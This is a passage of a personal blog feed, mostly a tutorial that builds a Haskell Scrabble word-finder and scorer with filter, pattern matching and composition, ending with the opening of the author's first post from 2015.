<span class="p">}</span>
<span class="kd">var</span> <span class="nx">letters</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">caietsh</span><span class="dl">"</span><span class="p">;</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">permute</span><span class="p">(</span><span class="nx">letters</span><span class="p">));</span>
</pre></td></tr></tbody></table></code></pre></figure>
<p>This code isn’t the most easily readable, and if you copy it into a file to run with node, you’ll be waiting for quite some time before it finishes. What’s more, is that this isn’t even <em>all</em> the word combinations that are possible - it leaves out all the combinations that don’t use all of the available letters. While it’s very possible that there’s a better algorithm for finding permutations of a string, it’s likely to be more complex and far less easy to read.</p>
<p>Even after getting this list of possible words, finding the intersection of the list with the Scrabble™ dictionary will be a very expensive process - given 8 letters, there are <em>13700 possibilities</em>.</p>
<h2 id="enter-haskell">Enter Haskell</h2>
<p>Lists are the bread and butter of Haskell. You use them <em>everywhere</em>. As such, the standard library includes lots of functions for working with them, and tasks like what we are dealing with become almost trivial.</p>
<figure class="highlight"><pre><code class="language-haskell" data-lang="haskell"><table class="rouge-table"><tbody><tr><td class="gutter gl"><pre class="lineno">1
2
</pre></td><td class="code"><pre><span class="n">possibilities</span> <span class="o">::</span> <span class="kt">String</span> <span class="o">-></span> <span class="p">[</span><span class="kt">String</span><span class="p">]</span>
<span class="n">possibilities</span> <span class="o">=</span> <span class="n">concat</span> <span class="o">.</span> <span class="n">map</span> <span class="n">permutations</span> <span class="o">.</span> <span class="n">subsequences</span>
</pre></td></tr></tbody></table></code></pre></figure>
<p>This is the entire function for generating a list of possible combinations, given a string. It is written in what is known as <a href="https://wiki.haskell.org/Pointfree">point-free notation</a> and with function composition, so if you aren’t familiar with Haskell, this version may make more sense:</p>
<figure class="highlight"><pre><code class="language-haskell" data-lang="haskell"><table class="rouge-table"><tbody><tr><td class="gutter gl"><pre class="lineno">1
2
</pre></td><td class="code"><pre><span class="n">possibilities</span> <span class="o">::</span> <span class="kt">String</span> <span class="o">-></span> <span class="p">[</span><span class="kt">String</span><span class="p">]</span>
<span class="n">possibilities</span> <span class="n">letters</span> <span class="o">=</span> <span class="n">concat</span> <span class="p">(</span><span class="n">map</span> <span class="n">permutations</span> <span class="p">(</span><span class="n">subsequences</span> <span class="n">letters</span><span class="p">))</span>
</pre></td></tr></tbody></table></code></pre></figure>
<p>First, we get a list of <code class="highlighter-rouge">subsequences</code> of our letter set because we don’t necessarily have to use all the letters. Then, we <code class="highlighter-rouge">map</code> the function <code class="highlighter-rouge">permutations</code> to the list of subsequences we found, and finally, <code class="highlighter-rouge">concat</code>enate the resulting list of lists together so we end up with a list of strings. This list is pretty big for letter sets of size 7 or 8, so it can take a while to be computed. It takes even more time to find the intersection of our dictionary unless we sort our dictionary and create a binary search tree (something that I may need to do in the future just for fun). However, at this point, I thought of a much simpler way to find the possible words and started from the beginning.</p>
<h2 id="take-two">Take Two</h2>
<p>Instead of computing a list of <em>all</em> possible letter combinations, why not just go through the dictionary to see what is possible, <em>and a real word</em> . It’s a fairly obvious thing to do looking back, but when I first was thinking about this, it just never occured to me. So what is required to make it happen?</p>
<ol>
<li>Iterate through the dictionary</li>
<li>Check if each dictionary word can be made using our letters</li>
<li>Throw away the words we can’t make</li>
</ol>
<p>Simple right? Now before you look below here at the Haskell code, just imagine what this would look like written in Javascript, or Python, or Ruby. More than 30 lines, right? Here’s the complete Haskell code, inluding reading and parsing the Scrabble™ dictionary csv, and adding the possible scores for the returned words:</p>
<figure class="highlight"><pre><code class="language-haskell" data-lang="haskell"><table class="rouge-table"><tbody><tr><td class="gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
</pre></td><td class="code"><pre><span class="kr">import</span> <span class="nn">Data.List</span>
<span class="kr">import</span> <span class="nn">Data.Maybe</span>
<span class="kr">import</span> <span class="k">qualified</span> <span class="nn">Data.Map</span> <span class="k">as</span> <span class="n">M</span>
<span class="n">possibilities</span> <span class="o">::</span> <span class="kt">String</span> <span class="o">-></span> <span class="p">[</span><span class="kt">String</span><span class="p">]</span> <span class="o">-></span> <span class="p">[</span><span class="kt">String</span><span class="p">]</span>
<span class="n">possibilities</span> <span class="n">letters</span> <span class="o">=</span> <span class="n">filter</span> <span class="p">(</span><span class="n">possibleWord</span> <span class="n">letters</span><span class="p">)</span>
<span class="n">possibleWord</span> <span class="o">::</span> <span class="kt">String</span> <span class="o">-></span> <span class="kt">String</span> <span class="o">-></span> <span class="kt">Bool</span>
<span class="n">possibleWord</span> <span class="n">xs</span> <span class="kt">[]</span> <span class="o">=</span> <span class="kt">True</span>
<span class="n">possibleWord</span> <span class="n">xs</span> <span class="p">(</span><span class="n">y</span><span class="o">:</span><span class="n">ys</span><span class="p">)</span> <span class="o">=</span> <span class="kr">if</span> <span class="n">y</span> <span class="p">`</span><span class="n">elem</span><span class="p">`</span> <span class="n">xs</span>
<span class="kr">then</span> <span class="n">possibleWord</span> <span class="p">(</span><span class="n">delete</span> <span class="n">y</span> <span class="n">xs</span><span class="p">)</span> <span class="n">ys</span>
<span class="kr">else</span> <span class="kt">False</span>
<span class="n">scores</span> <span class="o">::</span> <span class="p">[</span><span class="kt">String</span><span class="p">]</span> <span class="o">-></span> <span class="p">[(</span><span class="kt">String</span><span class="p">,</span> <span class="kt">Int</span><span class="p">)]</span>
<span class="n">scores</span> <span class="o">=</span> <span class="n">map</span> <span class="p">(</span><span class="nf">\</span><span class="n">x</span> <span class="o">-></span> <span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">score</span> <span class="n">x</span><span class="p">))</span>
<span class="n">score</span> <span class="o">::</span> <span class="kt">String</span> <span class="o">-></span> <span class="kt">Int</span>
<span class="n">score</span> <span class="o">=</span> <span class="n">foldr</span> <span class="p">(</span><span class="nf">\</span><span class="n">tile</span> <span class="n">acc</span> <span class="o">-></span> <span class="n">acc</span> <span class="o">+</span> <span class="n">tileScore</span> <span class="n">tile</span><span class="p">)</span> <span class="mi">0</span>
<span class="kr">where</span> <span class="n">tileScore</span> <span class="n">t</span> <span class="o">=</span> <span class="n">fromJust</span> <span class="o">$</span> <span class="kt">M</span><span class="o">.</span><span class="n">lookup</span> <span class="n">t</span> <span class="n">tiles</span>
<span class="n">tiles</span> <span class="o">=</span> <span class="kt">M</span><span class="o">.</span><span class="n">fromList</span> <span class="p">[(</span><span class="sc">'a'</span><span class="p">,</span><span class="mi">1</span><span class="p">),(</span><span class="sc">'b'</span><span class="p">,</span><span class="mi">3</span><span class="p">),(</span><span class="sc">'c'</span><span class="p">,</span><span class="mi">3</span><span class="p">),(</span><span class="sc">'d'</span><span class="p">,</span><span class="mi">2</span><span class="p">)</span>
<span class="p">,(</span><span class="sc">'e'</span><span class="p">,</span><span class="mi">1</span><span class="p">),(</span><span class="sc">'f'</span><span class="p">,</span><span class="mi">4</span><span class="p">),(</span><span class="sc">'g'</span><span class="p">,</span><span class="mi">2</span><span class="p">),(</span><span class="sc">'h'</span><span class="p">,</span><span class="mi">4</span><span class="p">)</span>
<span class="p">,(</span><span class="sc">'i'</span><span class="p">,</span><span class="mi">1</span><span class="p">),(</span><span class="sc">'j'</span><span class="p">,</span><span class="mi">8</span><span class="p">),(</span><span class="sc">'k'</span><span class="p">,</span><span class="mi">5</span><span class="p">),(</span><span class="sc">'l'</span><span class="p">,</span><span class="mi">1</span><span class="p">)</span>
<span class="p">,(</span><span class="sc">'m'</span><span class="p">,</span><span class="mi">3</span><span class="p">),(</span><span class="sc">'n'</span><span class="p">,</span><span class="mi">1</span><span class="p">),(</span><span class="sc">'o'</span><span class="p">,</span><span class="mi">1</span><span class="p">),(</span><span class="sc">'p'</span><span class="p">,</span><span class="mi">3</span><span class="p">)</span>
<span class="p">,(</span><span class="sc">'q'</span><span class="p">,</span><span class="mi">10</span><span class="p">),(</span><span class="sc">'r'</span><span class="p">,</span><span class="mi">1</span><span class="p">),(</span><span class="sc">'s'</span><span class="p">,</span><span class="mi">1</span><span class="p">),(</span><span class="sc">'t'</span><span class="p">,</span><span class="mi">1</span><span class="p">)</span>
<span class="p">,(</span><span class="sc">'u'</span><span class="p">,</span><span class="mi">1</span><span class="p">),(</span><span class="sc">'v'</span><span class="p">,</span><span class="mi">4</span><span class="p">),(</span><span class="sc">'w'</span><span class="p">,</span><span class="mi">4</span><span class="p">),(</span><span class="sc">'y'</span><span class="p">,</span><span class="mi">4</span><span class="p">)</span>
<span class="p">,(</span><span class="sc">'x'</span><span class="p">,</span><span class="mi">8</span><span class="p">),(</span><span class="sc">'z'</span><span class="p">,</span><span class="mi">10</span><span class="p">)]</span>
<span class="n">main</span> <span class="o">=</span> <span class="kr">do</span>
<span class="n">dict</span> <span class="o"><-</span> <span class="n">readFile</span> <span class="s">"./dictionary.csv"</span>
<span class="n">putStrLn</span> <span class="s">"Input your scrabble letters:"</span>
<span class="n">tiles</span> <span class="o"><-</span> <span class="n">getLine</span>
<span class="n">putStrLn</span> <span class="o">$</span> <span class="n">show</span>
<span class="o">.</span> <span class="n">sortBy</span> <span class="n">comparator</span>
<span class="o">.</span> <span class="n">scores</span>
<span class="o">.</span> <span class="n">possibilities</span> <span class="n">tiles</span> <span class="o">$</span> <span class="n">map</span> <span class="n">init</span> <span class="o">$</span> <span class="n">lines</span> <span class="n">dict</span>
<span class="kr">where</span> <span class="n">comparator</span> <span class="n">a</span> <span class="n">b</span> <span class="o">=</span> <span class="kr">if</span> <span class="n">snd</span> <span class="n">a</span> <span class="o">></span> <span class="n">snd</span> <span class="n">b</span> <span class="kr">then</span> <span class="kt">LT</span> <span class="kr">else</span> <span class="kt">GT</span>
</pre></td></tr></tbody></table></code></pre></figure>
<p>Let’s walk through the code line by line.</p>
<figure class="highlight"><pre><code class="language-haskell" data-lang="haskell"><table class="rouge-table"><tbody><tr><td class="gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="code"><pre><span class="kr">import</span> <span class="nn">Data.List</span>
<span class="kr">import</span> <span class="nn">Data.Maybe</span>
<span class="kr">import</span> <span class="k">qualified</span> <span class="nn">Data.Map</span> <span class="k">as</span> <span class="n">M</span>
</pre></td></tr></tbody></table></code></pre></figure>
<p>These are pretty self explanatory. We need some of the functions that are specific to lists in <code class="highlighter-rouge">Data.List</code>, the <code class="highlighter-rouge">fromJust</code> function exposed by <code class="highlighter-rouge">Data.Maybe</code>, and <code class="highlighter-rouge">Data.Map</code> for a map - namespaced as <code class="highlighter-rouge">M</code> to avoid naming collisions<sup id="fnref:fn-namespaces"><a href="#fn:fn-namespaces" class="footnote">1</a></sup>.</p>
<figure class="highlight"><pre><code class="language-haskell" data-lang="haskell"><table class="rouge-table"><tbody><tr><td class="gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre></td><td class="code"><pre><span class="n">possibilities</span> <span class="o">::</span> <span class="kt">String</span> <span class="o">-></span> <span class="p">[</span><span class="kt">String</span><span class="p">]</span> <span class="o">-></span> <span class="p">[</span><span class="kt">String</span><span class="p">]</span>
<span class="n">possibilities</span> <span class="n">letters</span> <span class="o">=</span> <span class="n">filter</span> <span class="p">(</span><span class="n">possibleWord</span> <span class="n">letters</span><span class="p">)</span>
<span class="n">possibleWord</span> <span class="o">::</span> <span class="kt">String</span> <span class="o">-></span> <span class="kt">String</span> <span class="o">-></span> <span class="kt">Bool</span>
<span class="n">possibleWord</span> <span class="n">xs</span> <span class="kt">[]</span> <span class="o">=</span> <span class="kt">True</span>
<span class="n">possibleWord</span> <span class="n">xs</span> <span class="p">(</span><span class="n">y</span><span class="o">:</span><span class="n">ys</span><span class="p">)</span> <span class="o">=</span> <span class="kr">if</span> <span class="n">y</span> <span class="p">`</span><span class="n">elem</span><span class="p">`</span> <span class="n">xs</span>
<span class="kr">then</span> <span class="n">possibleWord</span> <span class="p">(</span><span class="n">delete</span> <span class="n">y</span> <span class="n">xs</span><span class="p">)</span> <span class="n">ys</span>
<span class="kr">else</span> <span class="kt">False</span>
</pre></td></tr></tbody></table></code></pre></figure>
<p>Here is the meat of the code, we create the functions that will give us a list of all possible words. First, we’ll look at <code class="highlighter-rouge">possibleWord</code>. This is the check that takes a valid Scrabble™ word, and a list of our letters (<code class="highlighter-rouge">xs</code>), then checks if the first letter is in the Scrabble™ word<sup id="fnref:fn-char_lists"><a href="#fn:fn-char_lists" class="footnote">2</a></sup>. If it is, it removes that letter from the scrabble word and repeats the process using our remaining letters that haven’t been used, and the new word (less the character we just removed). Stepwise, it looks like this:</p>
<figure class="highlight"><pre><code class="language-haskell" data-lang="haskell"><table class="rouge-table"><tbody><tr><td class="gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre></td><td class="code"><pre><span class="n">possibleWord</span> <span class="s">"aresyin"</span> <span class="s">"rainy"</span>
<span class="c1">-- checks if 'r' is in "aresyin", and succeeds</span>
<span class="n">possibleWord</span> <span class="s">"aesyin"</span> <span class="s">"ainy"</span>
<span class="c1">-- checks if 'a' is in "aesyin", and succeeds,</span>
<span class="c1">-- continuing this pattern until the end where</span>
<span class="n">possibleWord</span> <span class="s">"es"</span> <span class="s">""</span>
<span class="c1">-- This case will match the first pattern of</span>
<span class="c1">-- possibleWord xs [] = True</span>
<span class="c1">-- and will return True</span>
</pre></td></tr></tbody></table></code></pre></figure>
<p>This function is then applied to the list of possible Scrabble™ words in <code class="highlighter-rouge">possibilities</code>, using <code class="highlighter-rouge">filter</code>. This works the same as <code class="highlighter-rouge">Array.prototype.filter</code> in Javascript, and I’m sure most otherlanguates behave in a similar way. What makes this code nicer (in my opinion) is the use of pattern matching and not having to write for loops and explicitly declare temporary variables.</p>
<p>Next, we add the scores:</p>
<figure class="highlight"><pre><code class="language-haskell" data-lang="haskell"><table class="rouge-table"><tbody><tr><td class="gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
</pre></td><td class="code"><pre><span class="n">scores</span> <span class="o">::</span> <span class="p">[</span><span class="kt">String</span><span class="p">]</span> <span class="o">-></span> <span class="p">[(</span><span class="kt">String</span><span class="p">,</span> <span class="kt">Int</span><span class="p">)]</span>
<span class="n">scores</span> <span class="o">=</span> <span class="n">map</span> <span class="p">(</span><span class="nf">\</span><span class="n">x</span> <span class="o">-></span> <span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">score</span> <span class="n">x</span><span class="p">))</span>
<span class="n">score</span> <span class="o">::</span> <span class="kt">String</span> <span class="o">-></span> <span class="kt">Int</span>
<span class="n">score</span> <span class="o">=</span> <span class="n">foldr</span> <span class="p">(</span><span class="nf">\</span><span class="n">tile</span> <span class="n">acc</span> <span class="o">-></span> <span class="n">acc</span> <span class="o">+</span> <span class="n">tileScore</span> <span class="n">tile</span><span class="p">)</span> <span class="mi">0</span>
<span class="kr">where</span> <span class="n">tileScore</span> <span class="n">t</span> <span class="o">=</span> <span class="n">fromJust</span> <span class="o">$</span> <span class="kt">M</span><span class="o">.</span><span class="n">lookup</span> <span class="n">t</span> <span class="n">tiles</span>
<span class="n">tiles</span> <span class="o">=</span> <span class="kt">M</span><span class="o">.</span><span class="n">fromList</span> <span class="p">[(</span><span class="sc">'a'</span><span class="p">,</span><span class="mi">1</span><span class="p">),(</span><span class="sc">'b'</span><span class="p">,</span><span class="mi">3</span><span class="p">),(</span><span class="sc">'c'</span><span class="p">,</span><span class="mi">3</span><span class="p">),(</span><span class="sc">'d'</span><span class="p">,</span><span class="mi">2</span><span class="p">)</span>
<span class="p">,(</span><span class="sc">'e'</span><span class="p">,</span><span class="mi">1</span><span class="p">),(</span><span class="sc">'f'</span><span class="p">,</span><span class="mi">4</span><span class="p">),(</span><span class="sc">'g'</span><span class="p">,</span><span class="mi">2</span><span class="p">),(</span><span class="sc">'h'</span><span class="p">,</span><span class="mi">4</span><span class="p">)</span>
<span class="p">,(</span><span class="sc">'i'</span><span class="p">,</span><span class="mi">1</span><span class="p">),(</span><span class="sc">'j'</span><span class="p">,</span><span class="mi">8</span><span class="p">),(</span><span class="sc">'k'</span><span class="p">,</span><span class="mi">5</span><span class="p">),(</span><span class="sc">'l'</span><span class="p">,</span><span class="mi">1</span><span class="p">)</span>
<span class="p">,(</span><span class="sc">'m'</span><span class="p">,</span><span class="mi">3</span><span class="p">),(</span><span class="sc">'n'</span><span class="p">,</span><span class="mi">1</span><span class="p">),(</span><span class="sc">'o'</span><span class="p">,</span><span class="mi">1</span><span class="p">),(</span><span class="sc">'p'</span><span class="p">,</span><span class="mi">3</span><span class="p">)</span>
<span class="p">,(</span><span class="sc">'q'</span><span class="p">,</span><span class="mi">10</span><span class="p">),(</span><span class="sc">'r'</span><span class="p">,</span><span class="mi">1</span><span class="p">),(</span><span class="sc">'s'</span><span class="p">,</span><span class="mi">1</span><span class="p">),(</span><span class="sc">'t'</span><span class="p">,</span><span class="mi">1</span><span class="p">)</span>
<span class="p">,(</span><span class="sc">'u'</span><span class="p">,</span><span class="mi">1</span><span class="p">),(</span><span class="sc">'v'</span><span class="p">,</span><span class="mi">4</span><span class="p">),(</span><span class="sc">'w'</span><span class="p">,</span><span class="mi">4</span><span class="p">),(</span><span class="sc">'y'</span><span class="p">,</span><span class="mi">4</span><span class="p">)</span>
<span class="p">,(</span><span class="sc">'x'</span><span class="p">,</span><span class="mi">8</span><span class="p">),(</span><span class="sc">'z'</span><span class="p">,</span><span class="mi">10</span><span class="p">)]</span>
</pre></td></tr></tbody></table></code></pre></figure>
<p>We calculate <code class="highlighter-rouge">score</code> for a word by folding over a word with a lambda expression that will sum the tile values, and apply <code class="highlighter-rouge">score</code> using <code class="highlighter-rouge">map</code> to all the possible words we’ve found above. On line 6, <code class="highlighter-rouge">fromJust</code> is the function we need to use from <code class="highlighter-rouge">Data.Maybe</code> and all it does is extract the value from the <code class="highlighter-rouge">Maybe Int</code> type returned by <code class="highlighter-rouge">M.lookup t tiles</code>, throwing an error if the specified tile can’t be found. When all is said and done, <code class="highlighter-rouge">scores</code> will be used to create a list of tuples, containing a word and its score.</p>
<figure class="highlight"><pre><code class="language-haskell" data-lang="haskell"><table class="rouge-table"><tbody><tr><td class="gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre></td><td class="code"><pre><span class="n">main</span> <span class="o">=</span> <span class="kr">do</span>
<span class="n">dict</span> <span class="o"><-</span> <span class="n">readFile</span> <span class="s">"./dictionary.csv"</span>
<span class="n">putStrLn</span> <span class="s">"Input your scrabble letters:"</span>
<span class="n">tiles</span> <span class="o"><-</span> <span class="n">getLine</span>
<span class="n">putStrLn</span> <span class="o">$</span> <span class="n">show</span>
<span class="o">.</span> <span class="n">sortBy</span> <span class="n">comparator</span>
<span class="o">.</span> <span class="n">scores</span>
<span class="o">.</span> <span class="n">possibilities</span> <span class="n">tiles</span> <span class="o">$</span> <span class="n">map</span> <span class="n">init</span> <span class="o">$</span> <span class="n">lines</span> <span class="n">dict</span>
<span class="kr">where</span> <span class="n">comparator</span> <span class="n">a</span> <span class="n">b</span> <span class="o">=</span> <span class="kr">if</span> <span class="n">snd</span> <span class="n">a</span> <span class="o">></span> <span class="n">snd</span> <span class="n">b</span> <span class="kr">then</span> <span class="kt">LT</span> <span class="kr">else</span> <span class="kt">GT</span>
</pre></td></tr></tbody></table></code></pre></figure>
<p>Finally, we compose all of our functions together in the <code class="highlighter-rouge">main</code> function and output what we need. I haven’t gone to great lengths to make the output very pretty, but it gets the job done. We first read the file of possible words into a string (it contains a word on every line and nothing else), read in our tiles, then wire our functions together. It helps sometimes to read a long composition in reverse</p>
<ul>
<li>take the string of possible words, and split it into lines</li>
<li>get everything except the last element of each line (we need to ignore the <code class="highlighter-rouge">\\n</code>)</li>
<li>apply the possibilities filter to our list of possible words</li>
<li>calculate the scores for our list of valid words</li>
<li>sort by scores (the scond value of the tuple)</li>
<li>output the results</li>
<li>…</li>
<li>profit!</li>
</ul>
<p>This likely isn’t the most efficient way to get the task done, but it was a great way to get a grasp on Haskells most commonly used features: pattern matching, composition (<code class="highlighter-rouge">.</code>), and <code class="highlighter-rouge">map</code> and <code class="highlighter-rouge">foldr</code>. I wouldn’t suggest using this in your next game of Scrabble™ though. It <em>will</em> run more than fast enough to work in your turn, but nobody likes a cheater.</p>
<p>Code can be found <a href="https://github.com/mdtusz/scrabble-cheat">here</a>.</p>
<div class="footnotes">
<ol>
<li id="fn:fn-namespaces">
<p>Haskell has a set of default functions loaded as <code class="highlighter-rouge">Prelude</code>, some of which have names that will conflict with packages loaded in. We can avoid this by making an imported module <code class="highlighter-rouge">qualified</code>, or specifying which functions to include or exclude using syntax like <code class="highlighter-rouge">import Data.List (nub, sort)</code> to include <code class="highlighter-rouge">nub</code> and <code class="highlighter-rouge">sort</code>, or <code class="highlighter-rouge">import Data.List hiding (nub, sort)</code> to load everything <em>except</em> <code class="highlighter-rouge">nub</code> and <code class="highlighter-rouge">sort</code>. <a href="#fnref:fn-namespaces" class="reversefootnote">↩</a></p>
</li>
<li id="fn:fn-char_lists">
<p>Conveniently, <code class="highlighter-rouge">Strings</code> and <code class="highlighter-rouge">[Char]</code>’s are treated the same in Haskell. <a href="#fnref:fn-char_lists" class="reversefootnote">↩</a></p>
</li>
</ol>
</div>
First2015-08-24T00:00:00-05:00http://0.0.0.0:4000/2015/08/24/first<p>Creating a first post for a personal website is tricky. It sets the mood for everything else that gets posted, so it’s important to write in the way you want to be perceived. Should I be more laid back and casual, or technical and formal? I’ve already been sitting at my keyboard for too long on a hot Montreal evening, so I’m deciding to just <em>not</em> think about it and write, and try to write frequent, small snippets of posts instead of the often seen monolithic posts that some blogs have. This is partially because it takes a while for me to write, but moreso because I don’t think I’m quite at a level where I can confidently write about a subject for more than a few paragraphs at a time. Until that day comes, I’ll keep it short and sweet and just share my personal discoveries.</p>